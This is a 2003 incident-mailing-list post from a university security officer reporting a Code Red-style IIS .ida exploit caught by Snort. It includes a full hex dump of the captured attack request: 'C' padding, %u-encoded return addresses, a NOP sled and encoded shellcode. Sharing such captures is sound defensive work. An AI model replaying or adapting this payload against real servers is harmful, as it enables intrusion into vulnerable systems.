FYI - different ISAPI .ida exploit

From: Russell Fulton (r.fulton_at_auckland.ac.nz)
Date: 10/19/03

  • Next message: James C. Slora, Jr.: "RE: Proxy attackers/hijackers"
    To: incidents@securityfocus.com
    Date: Mon, 20 Oct 2003 09:38:11 +1300
    
    

    Hi All,
            Snort picked this up today; one host delivered 50 of these to 3 (UNIX
    based ;) web servers in our network. It appears to be a code red style
    exploit but I have not seen one padded with 'C's before.

    BTW I notice that standard code red and nimda exploits are way down
    following the massive patching effort prompted by Blaster. As the
    saying goes "Every cloud has a siver lining" ;)

    Cheers, Russell.

    -- 
    Russell Fulton, Network Security Officer, The University of Auckland,
    New Zealand.
    Generated by ACID v0.9.6b23 on Mon, 20 Oct 2003 08:28:42 +1300
    ------------------------------------------------------------------------------
    #(1 - 135940) [2003-10-20 03:08:31] [cve/CAN-2000-0071] [icat/CAN-2000-0071] [bugtraq/1065] [arachnids/552] [snort/1243]  WEB-IIS ISAPI .ida attempt
    IPv4: 218.108.40.115 -> 202.37.88.21
          hlen=5 TOS=0 dlen=1500 ID=55937 flags=2 offset=0 TTL=108 chksum=2432
    TCP:  port=2601 -> dport: 80  flags=***A**** seq=313304431
          ack=3639528427 off=5 res=0 win=17520 urp=0 chksum=55493
    Payload:  length = 1460
    000 : 47 45 54 20 2F 4E 55 4C 4C 2E 49 44 41 3F 43 43   GET /NULL.IDA?CC
    010 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    020 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    030 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    040 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    050 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    060 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    070 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    080 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    090 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0a0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0b0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0c0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0d0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0e0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0f0 : 43 43 43 43 43 43 25 75 30 61 65 62 25 75 62 38   CCCCCC%u0aeb%ub8
    100 : 39 30 25 75 64 61 63 66 25 75 37 37 65 65 25 75   90%udacf%u77ee%u
    110 : 30 30 30 30 25 75 30 30 30 30 25 75 38 33 38 62   0000%u0000%u838b
    120 : 25 75 30 30 39 34 25 75 30 30 30 30 25 75 34 30   %u0094%u0000%u40
    130 : 38 62 25 75 30 35 36 34 25 75 30 31 35 30 25 75   8b%u0564%u0150%u
    140 : 30 30 30 30 25 75 65 30 66 66 25 75 39 30 39 30   0000%ue0ff%u9090
    150 : 3D 78 26 90 90 90 90 90 90 90 90 90 90 90 90 90   =x&.............
    160 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    170 : 90 90 90 EB 09 90 90 90 5F EB 08 90 90 90 E8 F5   ........_.......
    180 : FF FF FF 8D 6F F0 8D 7D 2D 90 90 90 8B F7 66 B8   ....o..}-.....f.
    190 : 48 06 33 C9 66 8B C8 B4 99 FC AC 32 C4 AA E2 FA   H.3.f......2....
    1a0 : 14 24 EC 9F 99 99 65 AA 50 28 B9 29 BD 6B 37 5F   .$....e.P(.).k7_
    1b0 : DE 66 99 71 94 9D 99 99 71 16 9D 99 99 71 D7 9B   .f.q....q....q..
    1c0 : 99 99 10 1C DA 9C 99 99 71 C8 9B 99 99 71 BD 9A   ........q....q..
    1d0 : 99 99 10 1C DE 9C 99 99 71 27 98 99 99 10 1C D6   ........q'......
    1e0 : 9C 99 99 12 1C DE 9C 99 99 71 E6 9B 99 99 10 1C   .........q......
    1f0 : D2 9C 99 99 71 C7 99 99 99 71 08 99 99 99 1A 61   ....q....q.....a
    200 : 99 ED 79 12 1C D2 9C 99 99 C9 66 0C 94 9F 99 99   ..y.......f.....
    210 : 12 1C DE 9C 99 99 C9 66 0C 94 9F 99 99 12 1C B6   .......f........
    220 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C A2 9C 99 99   ....f...........
    230 : C9 66 0C 1F 9C 99 99 21 99 99 99 99 C9 12 1C D6   .f.....!........
    240 : 9C 99 99 C9 66 0C 5C 9C 99 99 21 99 99 99 99 C9   ....f.\...!.....
    250 : 66 0C 4F 9C 99 99 5A 12 1C D2 9C 99 99 F3 99 F3   f.O...Z.........
    260 : 80 14 1C 9A 98 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
    270 : 0C 9A 9F 99 99 5A 94 93 CE F0 F7 F7 ED D8 EC ED   .....Z..........
    280 : F6 D8 ED ED F8 FA F2 B9 CF AB A9 94 93 94 93 F1   ................
    290 : 09 99 99 99 66 0C 26 9C 99 99 12 1C B6 9C 99 99   ....f.&.........
    2a0 : 71 5F 99 99 99 1A 61 66 96 1D 2F 99 99 99 1A 61   q_....af../....a
    2b0 : 99 ED CE 09 09 09 09 F3 99 14 1C A6 9C 99 99 C9   ................
    2c0 : F1 99 9D 99 99 12 1C DA 9C 99 99 C9 12 1C B6 9C   ................
    2d0 : 99 99 C9 66 0C 2F 9C 99 99 1A 61 99 96 1D 1B 99   ...f./....a.....
    2e0 : 99 99 F3 99 12 1C A6 9C 99 99 C9 12 1C DA 9C 99   ................
    2f0 : 99 C9 12 1C D2 9C 99 99 C9 66 0C 9A 9F 99 99 1A   .........f......
    300 : 61 66 ED FD 09 09 09 09 72 1C F3 99 F1 99 9D 99   af......r.......
    310 : 99 12 1C DA 9C 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
    320 : 0C 91 9F 99 99 1A 61 99 ED A7 09 09 09 09 1A 61   ......a........a
    330 : 66 ED AC 09 09 09 09 AA 42 CA 14 04 A6 9C 99 99   f.......B.......
    340 : CA C9 12 1C DA 9C 99 99 C9 12 1C A2 9C 99 99 C9   ................
    350 : 66 0C 35 9C 99 99 1A 61 99 ED 90 09 09 09 09 70   f.5....a.......p
    360 : B2 66 66 66 AA 59 D1 5A AA 59 5A AA 42 CA 14 04   .fff.Y.Z.YZ.B...
    370 : BD 9B 99 99 CA AA 42 CA CA CA C9 66 0C 0B 9C 99   ......B....f....
    380 : 99 1A 61 99 ED 92 09 09 09 09 12 1C BD 9B 99 99   ..a.............
    390 : 5A 21 66 66 66 66 5A 99 99 99 99 12 1C DA 9C 99   Z!ffffZ.........
    3a0 : 99 5E 99 DD 99 99 99 C9 66 0C FE 9C 99 99 12 04   .^......f.......
    3b0 : DA 9C 99 99 12 1C AA 9C 99 99 10 DA D9 10 DA A5   ................
    3c0 : 12 1C AE 9C 99 99 10 DA A1 21 98 98 99 99 10 DA   .........!......
    3d0 : B5 CA CA AA 59 C9 C9 C9 D9 C9 D1 C9 C9 14 1C EC   ....Y...........
    3e0 : 9F 99 99 C9 AA 59 C9 66 0C EE 9C 99 99 12 1C AA   .....Y.f........
    3f0 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C AE 9C 99 99   ....f...........
    400 : C9 66 0C 1F 9C 99 99 12 1C DA 9C 99 99 12 99 5A   .f.............Z
    410 : F1 99 9D 99 99 F3 D9 66 0C 39 9C 99 99 5A AA 59   .......f.9...Z.Y
    420 : C9 14 1C 77 9B 99 99 5E 99 95 99 99 99 C9 14 1C   ...w...^........
    430 : AA 9C 99 99 C9 14 1C B6 9C 99 99 C9 66 0C C5 9C   ............f...
    440 : 99 99 AA 59 C9 14 1C 77 9B 99 99 C9 14 1C A2 9C   ...Y...w........
    450 : 99 99 C9 14 1C AE 9C 99 99 C9 66 0C C5 9C 99 99   ..........f.....
    460 : 5A 99 99 99 99 99 99 99 99 98 99 99 99 C9 14 04   Z...............
    470 : B8 9A 99 99 5E 9A 89 99 99 99 CA 14 04 DB 9D 99   ....^...........
    480 : 99 CA C9 66 0C 65 9C 99 99 12 41 1A 61 99 C1 E5   ...f.e....A.a...
    490 : 45 12 5A 5A 89 99 99 99 F3 8A 14 1C F6 9A 99 99   E.ZZ............
    4a0 : C9 66 0C BD 9F 99 99 14 1C F6 9A 99 99 C9 66 0C   .f............f.
    4b0 : A9 9F 99 99 1A 61 99 ED BB 09 09 09 09 12 E9 95   .....a..........
    4c0 : 12 67 65 34 1A 61 99 ED 8A 09 09 09 09 12 99 A5   .ge4.a..........
    4d0 : 93 ED 69 A5 59 ED 75 A5 35 ED 71 5A 12 6E 34 12   ..i.Y.u.5.qZ.n4.
    4e0 : 99 5A 99 99 99 99 99 99 99 99 99 99 99 99 99 99   .Z..............
    4f0 : 99 99 99 99 99 99 12 1C DA 9C 99 99 C9 F3 9B 66   ...............f
    500 : 0C 80 9F 99 99 F3 99 F3 98 F3 9B 66 0C 70 9C 99   ...........f.p..
    510 : 99 1A 61 66 96 1D 01 99 99 99 10 1C DE 9C 99 99   ..af............
    520 : 14 04 A6 9C 99 99 5E 9A 98 99 99 99 F3 9D CA F3   ......^.........
    530 : 9D F1 66 66 99 99 C9 66 0C A7 9F 99 99 1A 61 99   ..ff...f......a.
    540 : EC E9 09 09 09 09 FF 12 1C F6 9F 99 99 FF 10 1C   ................
    550 : DD 9D 99 99 12 1C E8 9F 99 99 10 1C DF 9D 99 99   ................
    560 : 1A 61 66 EC 96 09 09 09 09 71 B3 66 66 66 10 1C   .af......q.fff..
    570 : DF 9D 99 99 12 1C DE 9C 99 99 F3 89 14 04 DB 9D   ................
    580 : 99 99 CA C9 66 0C 69 9C 99 99 1A 61 99 EC BA 09   ....f.i....a....
    590 : 09 09 09 F3 9C 12 1C DE 9C 99 99 C9 66 0C 6C 9C   ............f.l.
    5a0 : 99 99 1A 61 99 EC 92 09 09 09 09 12 1C DE 9C 99   ...a............
    5b0 : 99 5A AA 59                                       .Z.Y
    ---------------------------------------------------------------------------
    FREE Whitepaper: Better Management for Network Security
    Looking for a better way to manage your IP security?
    Learn how Solsoft can help you:
    - Ensure robust IP security through policy-based management
    - Make firewall, VPN, and NAT rules interoperable across heterogeneous
    networks
    - Quickly respond to network events from a central console
    Download our FREE whitepaper at:
    http://www.securityfocus.com/sponsor/Solsoft_incidents_031015
    ----------------------------------------------------------------------------
    

  • Next message: James C. Slora, Jr.: "RE: Proxy attackers/hijackers"

    Relevant Pages